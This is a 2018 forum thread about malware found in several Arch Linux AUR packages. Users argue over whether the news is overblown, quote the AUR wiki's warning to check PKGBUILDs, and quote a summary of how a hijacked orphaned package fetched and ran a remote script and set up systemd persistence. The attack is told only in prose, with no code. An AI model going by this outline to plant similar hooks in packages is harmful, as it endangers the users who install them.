Arch Linux AUR Repository Found to Contain Malware

ChuangTzu · 07-11-2018, 05:13 PM

I attempted to post this in the Linux News section but it appears that it was not approved for posting....

"The Arch Linux user-maintained software repository called AUR has been found to host malware. The discovery was made after a change in one of the package installation instructions was made. This is yet another incident that showcases that Linux users should not explicitly trust user-controlled repositories..."

https://sensorstechforum.com/arch-li...ntain-malware/
https://www.bleepingcomputer.com/new...ge-repository/
https://betanews.com/2018/07/11/arch-linux-malware/
https://www.linuxuprising.com/2018/0...epository.html

Timothy Miller · 07-11-2018, 07:06 PM

I'm an Arch user and I have to say that my level of surprise is...none.

un1x · 07-11-2018, 09:44 PM

NADA on its front page !

https://aur.archlinux.org/

perhaps 'FUD' ? ? ?

syg00 · 07-11-2018, 10:54 PM

Long time Arch user, and I'm very surprised it didn't make the news on the front page. Seems unless you are subscribed to the AUR specific mail lists you don't need to know.
Bloody strange attitude IMHO.

I don't use AUR much, but it looks like damn near everyone uses one of the helper tools. Myself excluded of course.

ondoho · 07-12-2018, 03:29 AM

this is FUD, or maybe just trying to blow up what is essentially not news at all.

the title is misleading: it's not the AUR itself that's compromised, but one (or several) packages therein
that package is acroread. an adobe proprietary software reads & transmits my personal data? can't say i'm surprised...

the nature of AUR is such. no need to mention it on the frontpage; everybody who uses AUR packages should know this. excerpt from here:

Quote:

Warning: Carefully check all files. Carefully check the PKGBUILD and any .install file for malicious commands. PKGBUILDs are bash scripts containing functions to be executed by makepkg: these functions can contain any valid commands or Bash syntax, so it is totally possible for a PKGBUILD to contain dangerous commands through malice or ignorance on the part of the author. Since makepkg uses fakeroot (and should never be run as root), there is some level of protection but you should never count on it. If in doubt, do not build the package and seek advice on the forums or mailing list.

I should add: Don't blindly trust binary packages, either.

...or, as ChuangTzu quoted correctly:
This is yet another incident that showcases that Linux users should not explicitly trust user-controlled repositories...

un1x · 07-12-2018, 02:47 PM

WHY spreadin FUD ? ? ? nonsense !

Code:

ChuangTzu
"The Arch Linux user-maintained software repository called AUR has been found to host malware. The discovery was made after a change in one of the package installation instructions was made. This is yet another incident that showcases that Linux users should not explicitly trust user-controlled repositories..."

ondoho · 07-13-2018, 01:58 AM

what happened is someone took over an orphaned package & made malicious changes to the PKGBUILD. the fact that they could do that is totally normal and does NOT indicate that the AUR itself is compromised or anything. nobody claimed that either, but i'm just making sure that people understand what is happening here.

if you know what the AUR is and how it works, this is really no surprise at all.

one is not supposed to trust these packages explicitely.

i usually go by votes & popularity & comments.
if something is off, people notice very quickly (comments) and take appropriate action (thanks to archlinux' concept of Trusted Users this is possible).

Btw, all this was fixed 1-3 days BEFORE these articles even came out.

PS: of the four links in post #1 i found this one most informative. it's all there if one cares to read beyond a few buzzwords.

PPS: my original assessment that it's the acroread program itself that is the malware, was wrong. once again, read the article.

un1x · 07-13-2018, 08:44 AM

https://distrowatch.com/dwres.php?re...ine&story=6389

Quote:

People who run Arch Linux, or one of its many derivatives, received a reminder last week that while the Arch User Repository (AUR) is a convenient way to access a large number of software packages, the packages in that repository can come from anywhere and should not be blindly trusted. Sensors Tech Forum reports: "Linux users of all distributions have received a major warning not to explicitly trust user-run software repositories following the latest incident related to Arch Linux. The project's user-maintained AUR packages (which stands for Arch User Repository) have been found to host malware code in several instances. Fortunately a code analysis was able to discover the modifications in due time - only several days after the dangerous code was placed in the app installation instructions. The security investigation shows that shows that a malicious user with the nick name xeactor modified in June 7 an orphaned package (software without an active maintainer) called acroraed. The changes included a curl script that downloads and runs a script from a remote site. This installs a persistent software that reconfigures systemd in order to start periodically. While it appears that they are not a serious threat to the security of the infected hosts, the scripts can be manipulated at any time to include arbitrary code. Two other packages were modified in the same manner." Most Linux distribution have optional add-on repositories where community members can upload scripts or packages. These third-party items should be audited before being installed.